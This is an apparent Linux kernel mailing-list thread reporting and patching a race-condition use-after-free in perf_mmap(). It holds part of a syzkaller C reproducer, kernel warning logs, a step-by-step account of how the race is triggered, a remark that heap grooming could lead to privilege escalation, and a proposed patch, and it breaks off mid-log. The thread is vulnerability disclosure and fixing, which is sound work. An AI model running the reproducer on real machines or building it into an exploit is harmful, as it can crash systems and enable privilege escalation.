int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // 
__reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); 
NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 
= 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
Hi Peter,

Thanks for the review. You are right, my previous explanation was inaccurate. The actual race condition occurs between a failing mmap() on one event and a concurrent mmap() on a second event that shares the ring buffer (e.g., via output redirection). A detailed scenario is as follows:

1. Thread A calls mmap(event_A). It allocates the ring buffer, sets event_A->rb, and initializes the refcount to 1. It then drops mmap_mutex.
2. Thread A calls map_range(). Suppose this fails. Thread A then proceeds to the error path and calls perf_mmap_close().
3. Thread B concurrently calls mmap(event_B), where event_B is configured to share event_A's buffer. Thread B acquires event_A->mmap_mutex and sees the valid event_A->rb pointer.
4. The race triggers here: if Thread A's perf_mmap_close() logic decrements the ring buffer's refcount to 0 (releasing it) but the pointer event_A->rb is still visible to Thread B (or was read by Thread B before it was cleared), Thread B triggers the "refcount_t: addition on 0" warning when it attempts to increment the refcount in perf_mmap_rb().

The fix extends the scope of mmap_mutex to cover map_range() and the potential error-handling path. This ensures that event->rb is only exposed to other threads after it is fully and successfully mapped, or is cleaned up atomically inside the lock if mapping fails.

I have updated the commit message accordingly.

Thanks,
Haocheng
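For illustration, the "addition on 0" hazard can be modeled with a userspace sketch. This is a simplified C11 analogue, not the kernel's refcount_t implementation: ref_get_not_zero() stands in for the kernel's refcount_inc_not_zero() pattern, which refuses to take a reference on an object whose count already hit zero, whereas a blind increment (like refcount_inc() on a concurrently-released event->rb) would resurrect a dead object.

```c
#include <stdatomic.h>
#include <stdbool.h>

/*
 * Toy refcount discipline (userspace C11 atomics; the kernel's refcount_t
 * additionally saturates and warns instead of silently wrapping).
 */

/* Drop a reference; returns true when this was the last one (free point). */
static bool ref_put(atomic_int *rc)
{
	return atomic_fetch_sub_explicit(rc, 1, memory_order_acq_rel) == 1;
}

/*
 * Take a reference only if the object is still alive (count > 0).
 * A plain atomic increment here would be the buggy pattern: it would
 * happily turn a dead object's count from 0 back to 1.
 */
static bool ref_get_not_zero(atomic_int *rc)
{
	int old = atomic_load_explicit(rc, memory_order_relaxed);

	do {
		if (old == 0)
			return false;	/* already dead: caller must re-lookup */
	} while (!atomic_compare_exchange_weak_explicit(rc, &old, old + 1,
							memory_order_acquire,
							memory_order_relaxed));
	return true;
}
```

In the scenario above, Thread B plays the role of the caller that must use the not-zero variant (or, as the patch does, stay inside the lock that keeps the count from reaching zero) rather than incrementing unconditionally.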
{ "author": "=?UTF-8?B?5L2Z5piK6ZOW?= <yuhaocheng035@gmail.com>", "date": "Mon, 2 Feb 2026 23:51:28 +0800", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
lkml
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello,

I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.

Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) in the perf_mmap function. This is caused by a race condition in which a ring_buffer object's reference count is incremented after it has already reached zero.

The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range()) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an "addition on 0" warning or a UAF when the kernel attempts to access or increment it later.

I verified this on Linux kernel version 6.18.5.

Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)

Symptoms and logs
-----------------
The kernel triggers a "refcount_t: addition on 0; use-after-free" warning followed by a memory leak warning. The full report is below:

audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff888103c17678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88 RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2 R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000 R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170 FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0 DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2 DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600 PKRU: 80000000 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] 
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7ef5cabb9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000 RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640 </TASK> ---[ end trace 0000000000000000 ]--- EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost EXT4-fs (loop0): Total free blocks count 0 EXT4-fs (loop0): Free/Dirty block details EXT4-fs (loop0): free_blocks=12386304 EXT4-fs (loop0): dirty_blocks=16387 EXT4-fs (loop0): Block reservation details EXT4-fs (loop0): i_reserved_data_blocks=16387 EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor) <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> Reproduce ---------- The issue is reproducible using the C reproducer attached. 
The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. The reproducer follows this execution flow:

1. Event Creation: it initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.

2. Multithreaded Hammering: the program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.

3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires mmap_mutex to set up the buffer but then drops it. Meanwhile, thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.

4. Vulnerability Trigger: because perf_mmap() accesses event->rb to perform map_range() after mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.

5. Crash/Warning: when Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb() or map_range()), the refcount_t infrastructure detects an "addition on 0", resulting in the KASAN or refcount_warn_saturate report.

Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a use-after-free (UAF) condition. While the immediate symptom is typically a kernel warning or a denial of service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming.
If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.

Patch
-----
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap

The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread closes
the event or detaches the buffer during this window, the reference
count of rb can drop to zero, leading to a UAF or refcount saturation
when map_range() or subsequent logic attempts to use it.

Fix this by extending the scope of mmap_mutex to cover the entire setup
process, including map_range(), ensuring the buffer remains valid until
the mapping is complete.

Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
 kernel/events/core.c | 42 +++++++++++++++++++---------------------
 1 file changed, 21 insertions(+), 21 deletions(-)

diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
 		ret = perf_mmap_aux(vma, event, nr_pages);
 		if (ret)
 			return ret;
-	}
-
-	/*
-	 * Since pinned accounting is per vm we cannot allow fork() to copy our
-	 * vma.
-	 */
-	vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
-	vma->vm_ops = &perf_mmap_vmops;
-	mapped = get_mapped(event, event_mapped);
-	if (mapped)
-		mapped(event, vma->vm_mm);
-
-	/*
-	 * Try to map it into the page table. On fail, invoke
-	 * perf_mmap_close() to undo the above, as the callsite expects
-	 * full cleanup in this case and therefore does not invoke
-	 * vmops::close().
-	 */
-	ret = map_range(event->rb, vma);
-	if (ret)
-		perf_mmap_close(vma);
+	/*
+	 * Since pinned accounting is per vm we cannot allow fork() to copy our
+	 * vma.
+	 */
+	vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+	vma->vm_ops = &perf_mmap_vmops;
+
+	mapped = get_mapped(event, event_mapped);
+	if (mapped)
+		mapped(event, vma->vm_mm);
+
+	/*
+	 * Try to map it into the page table. On fail, invoke
+	 * perf_mmap_close() to undo the above, as the callsite expects
+	 * full cleanup in this case and therefore does not invoke
+	 * vmops::close().
+	 */
+	ret = map_range(event->rb, vma);
+	if (ret)
+		perf_mmap_close(vma);
+	}
 
 	return ret;
 }
-- 
2.51.0

Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.

Best regards,
Haocheng Yu
Zhejiang University

Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.

audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff8881036bf678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000 RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000 R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0 FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 